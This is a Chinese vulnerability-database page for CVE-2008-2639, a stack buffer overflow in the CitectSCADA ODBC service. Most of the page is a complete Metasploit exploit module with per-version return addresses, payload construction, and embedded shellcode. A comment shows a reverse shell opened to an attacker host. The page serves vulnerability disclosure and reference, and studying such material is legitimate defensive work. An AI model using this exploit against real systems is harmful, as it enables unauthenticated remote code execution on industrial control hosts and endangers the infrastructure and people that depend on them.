CitectSCADA ODBC服务器远程栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1116023 漏洞类型 缓冲区溢出
发布时间 2008-09-05 更新时间 2008-09-08
CVE编号 CVE-2008-2639 CNNVD-ID CNNVD-200806-217
漏洞平台 Windows CVSS评分 7.6
|漏洞来源
https://www.exploit-db.com/exploits/6387
https://www.securityfocus.com/bid/29634
https://cxsecurity.com/issue/WLB-2008060099
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200806-217
|漏洞详情
CitectSCADA是用于在数据采集与监控系统(SCADA)中提供监视和控制功能的软件。CitectSCADA和CitectFacilities中包含有ODBC服务器功能为关系数据库提供远程SQL访问。ODBC服务器组件默认在20222/tcp端口上监听来自网络的客户端请求,TCP上的应用层协议读取4个字节的初始报文指定下一个报文中数据的长度,然后从同一TCP套接字读取该长度的下一个报文,其中前5个字节为固定的头。将网络中的第二个报文读取到缓冲区后,就会将数据拷贝到栈上固定大小的内部缓冲区。由于对所读取的数据缺少正确地长度检查,使用栈上所分配的固定大小目标缓冲区的内存拷贝操作可能会出现溢出,允许未经认证的远程攻击者在有漏洞的系统上执行任意指令。
|漏洞EXP
##
# $Id: citect_scada_odbc.rb
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
# 
#
# msfcli exploit/windows/misc/citect_scada_odbc RHOST=192.168.2.45 PAYLOAD=windows/shell/reverse_ord_tcp LHOST=192.168.2.101  TARGET=2 E
# [*] Started reverse handler
# ...
# [*] Sending stage (474 bytes)
# [*] Command shell session 1 opened (192.168.2.101:4444 -> 192.168.2.45:1039)
# 
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# 
# C:\Program Files\Citect\CitectSCADA\Bin>
# 
# Arbitrary code has been sucessfully run on Windows XP SP2 and SP3, Win98 SE and Windows 2003 Server SP1
#
require 'msf/core'

module Msf

class Exploits::Windows::Misc::Citect_SCADA_ODBC < Msf::Exploit::Remote

	include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'CitectSCADA ODBC Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack overflow in CitectSCADA's ODBC daemon.
				This has only been tested against Citect v5, v6 and v7. 
			},
			'Author'         => [ 'KF <kf_lists[at]digitalmunition.com>' ],
			'Version'        => '$Revision: 1 $',
			'References'     => 
				[
					['CVE', 'CVE-2008-2639'],
					['BID', '29634'],
					['URL', 'http://www.schneider-electric.com/sites/corporate/en/press/press-releases/viewer-press-releases.page?c_filepath=/templatedata/Content/Press_Release/data/en/shared/2005/10/20051019_schneider_electric_adds_scada_and_mes_capabilities_to_i.xml'],
					['URL', 'http://www.coresecurity.com/content/citect-scada-odbc-service-vulnerability','http://www.auscert.org.au/render.html?it=9433'],
					['URL', 'http://www.auscert.org.au/render.html?it=9433'],
					['URL', 'http://www.controsys.hu/anyagok/group_quality_assurance.pdf'],
					['URL', 'http://www.citect.com/documents/news_and_media/pr-citect-address-security.pdf'],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'BadChars' => "\x00",
					'StackAdjustment' => -3500
				},
			'Platform'       => 'win',
			
			'Targets'        =>
				[
					# Small sample of potential targets... There ARE universal targets for *some* versions. The base address can varry unfortunately.
					['CiExceptionMailer.dll on XP Sp2 or SP3 5.42',     { 'Version' => '5.42',    'OS' => 'xp',    'Ret' => 0x003a530e, 'Jump' => 0xffffff11e9, 'Payload' => { 'Space' => 216  } } ],
					['CiExceptionMailer.dll on Server 2003 Sp2 6.0-r0', { 'Version' => '6.0-r0',  'OS' => '2003',  'Ret' => 0x003a6aad, 'Jump' => 0xffffff15e9, 'Payload' => { 'Space' => 212  } } ],    
					['CiExceptionMailer.dll on XP Sp2 or SP3 6.0-r0',   { 'Version' => '6.0-r0',  'OS' => 'xp',    'Ret' => 0x0039cd5a, 'Jump' => 0xffffff11e9, 'Payload' => { 'Space' => 216  } } ],    
					['CiExceptionMailer.dll on XP Sp2 or SP3 6.10',    { 'Version' => '6.10',    'OS' => 'xp',    'Ret' => 0x00501113, 'Jump' => 0xffffff11e9, 'Payload' => { 'Space' => 380  } } ],  
					['CiExceptionMailer.dll on XP Sp2 or SP3 7.0-r0',   { 'Version' => '7.0-r0',  'OS' => 'xp',    'Ret' => 0x003e1e92, 'Jump' => 0xffffff11e9, 'Payload' => { 'Space' => 380  } } ],  
					['CiExceptionMailer.dll on 2003 Server SP1 7.0-r0', { 'Version' => '7.0-r0',  'OS' => '2003',  'Ret' => 0x003d59d7, 'Jump' => 0xfffffe7be9, 'Payload' => { 'Space' => 376  } } ],  
					['CiExceptionMailer.dll on Win98 5.50-r0',	    { 'Version' => '5.50-r0', 'OS' => 'win98', 'Ret' => 0x006dd8b7, 'Jump' => 0xffffff6fe9, 'Payload' => { 'Space' => 140  } } ],  
					['CiExceptionMailer.dll on XP SP2 5.50-r0',	    { 'Version' => '5.50-r0', 'OS' => 'xp',    'Ret' => 0x003a5e90, 'Jump' => 0xffffff11e9, 'Payload' => { 'Space' => 216  } } ],  
					['CiExceptionMailer.dll on 2003 Server 5.50-r0',    { 'Version' => '5.50-r0', 'OS' => '2003',  'Ret' => 0x003952ee, 'Jump' => 0xffffff15e9, 'Payload' => { 'Space' => 212  } } ],  
					['Test Crash',	  			            { 'Version' => '666',     'OS' => 'test',  'Ret' => 0xdeadbeef, 'Jump' => 0xdeadbabeee, 'Payload' => { 'Space' => 8192 } } ],  
				], 

			'Privileged'     => false,
			'DisclosureDate' => 'June 11 2008'
			))

			register_options(
			[
				Opt::RPORT(20222)
			], self.class)
	end

	def exploit
		connect

		print_status("Trying target #{target.name}...")
		if payload_space() != payload.encoded.length
			print_status("Metasploit payload bug... please check out from SVN")
			exit
		else 
			print_status("Space: #{payload_space()}")	
		end

		shortjmp   =    0xeb069090      # jump over garbage for SEH foo

		if(target['OS'] =~ /xp/)
			print_status("Using Windows XP Target")
		elsif (target['OS'] =~ /2003/)
			print_status("Using Windows 2003 Target")
		elsif (target['OS'] =~ /98/)
			print_status("no 98 foo yet")
		else (target['OS'] =~ /test/)
			print_status("Just testing.... don't mind me")
		end
	
		padding = 100  # Just fill up the end of the stack... 

		# There is some redundant shit here... will be cleaned up soon enough... 
		if (target['Version'] =~ /5.42/) || (target['Version'] =~ /6.0-r0/)
			filler = "\x90" * 10 + [target['Jump']].pack('Q')[0..4] + "\x90" * padding  
			mal = payload.encoded + [shortjmp].pack("N") + [target.ret].pack("V") + filler
		elsif (target['Version'] =~ /6.10/) || (target['Version'] =~ /7.0-r0/) 
			filler = [target['Jump']].pack('Q')[0..4] + "\x90" * padding  
			mal = payload.encoded + [shortjmp].pack("N") + [target.ret].pack("V") + filler
		elsif (target['Version'] =~ /5.50-r0/) 

			# This particular target encompases win98 windows XP and windows 2003 just so that no one feels left out. 
			# EVERYONE *CAN* be exploited... not just the guys running the modern stuff. Someone only needs to take a bit
			# of time to have a robust exploit for any platform or version they choose... 

			if(target['OS'] =~ /win98/)
				hop1 = 0xebb69090     # Short jump into small 72 byte buffer space - EBb6
				hop2 = target['Jump'] # Near jump into begining of entire buffer... leaves 140 chars of space. 
				seh = [target.ret].pack("V") # Call EAX from CiExceptionMailer.dll
	
				# Description : It is 110 Byte Shellcode which Pops up Message Box Under win98
				# This is just sample code from the milw0rm...its using static addresses from MY win98
				hell = 
				"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb" + 
				"\xd0\x76\xf7\xbf" +   # LoadLibraryA(libraryname) IN win98
				"\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb" +
				"\xa8\x6d\xf7\xbf" +   # GetProcAddress(hmodule,functionname)
				"\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51" +
				"\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff" +
				"\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff" +
				"\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff" +
				"\xff" + "PWNED." + "\x4e"
				mal = "\x90" * (payload_space - hell.length) + hell + [hop2].pack('Q')[0..4] + "Z" * 67 + [hop1].pack("N") + seh + "\x41" * padding
			elsif target['OS'] =~ /xp/ || target['OS'] =~ /2003/
				filler = "\x90" * 10 + [target['Jump']].pack('Q')[0..4] + "\x90" * padding  
				mal = payload.encoded + [shortjmp].pack("N") + [target.ret].pack("V") + filler
			end

		else (target['Version'] =~ /666/) 
			# Use this to find offsets for other versions that were not provided. 
			mal = Rex::Text.pattern_create(payload_space, Rex::Text::DefaultPatternSets)
			print_status("Use pattern_offset.rb to find the length")
		end	
	
		# Open your eyes people... listen carefully to the rhetoric. There is no spoon. 
		wakeup = [0x0000000002].pack('Q')[0..4] + [mal.length].pack("N") + mal

		len = [wakeup.length].pack("N")
		sock.put(len)
		sock.put(wakeup)
		print_status("Sent malicious ODBC packet...")

		handler
		print_status("Citect and other SCADA and Control vendors have been communicating potential " +
			"vulnerabilities of control systems when they are connected to the internet for some time. ")
		print_status("However, Citect believes this is only relevant to a company using ODBC technology and " +
			"directly connecting its system to the internet with no security in place -") 
		print_status("a situation unlikely in today’s business environment. ")

		disconnect	
	end

end
end

# milw0rm.com [2008-09-05]
|受影响的产品
Citect CitectSCADA 7 Citect CitectSCADA 6 Citect CitectFacilities 7
|参考资料

来源:US-CERT
名称:VU#476345
链接:http://www.kb.cert.org/vuls/id/476345
来源:XF
名称:citectscada-odbc-bo(42992)
链接:http://xforce.iss.net/xforce/xfdb/42992
来源:BID
名称:29634
链接:http://www.securityfocus.com/bid/29634
来源:BUGTRAQ
名称:20080611CORE-2008-0125:CitectSCADAODBCservicevulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/493272/100/0/threaded
来源:MILW0RM
名称:6387
链接:http://www.milw0rm.com/exploits/6387
来源:www.kb.cert.org
链接:http://www.kb.cert.org/vuls/id/CTAR-7ENQNH
来源:VUPEN
名称:ADV-2008-1834
链接:http://www.frsirt.com/english/advisories/2008/1834/references
来源:MISC
链接:http://www.coresecurity.com/?action=item&id=2186
来源:SECTRACK
名称:1020241
链接:http://securitytracker.com/id?1020241
来源:SREASON
名称:3944
链接:http://securityreason.com/securityalert/3944
来源:SECUNIA
名称:30638
链接:http://secunia.com/advisories/30638
来源:MISC
链接:http://isc.sans.org/diary.html?storyid=4556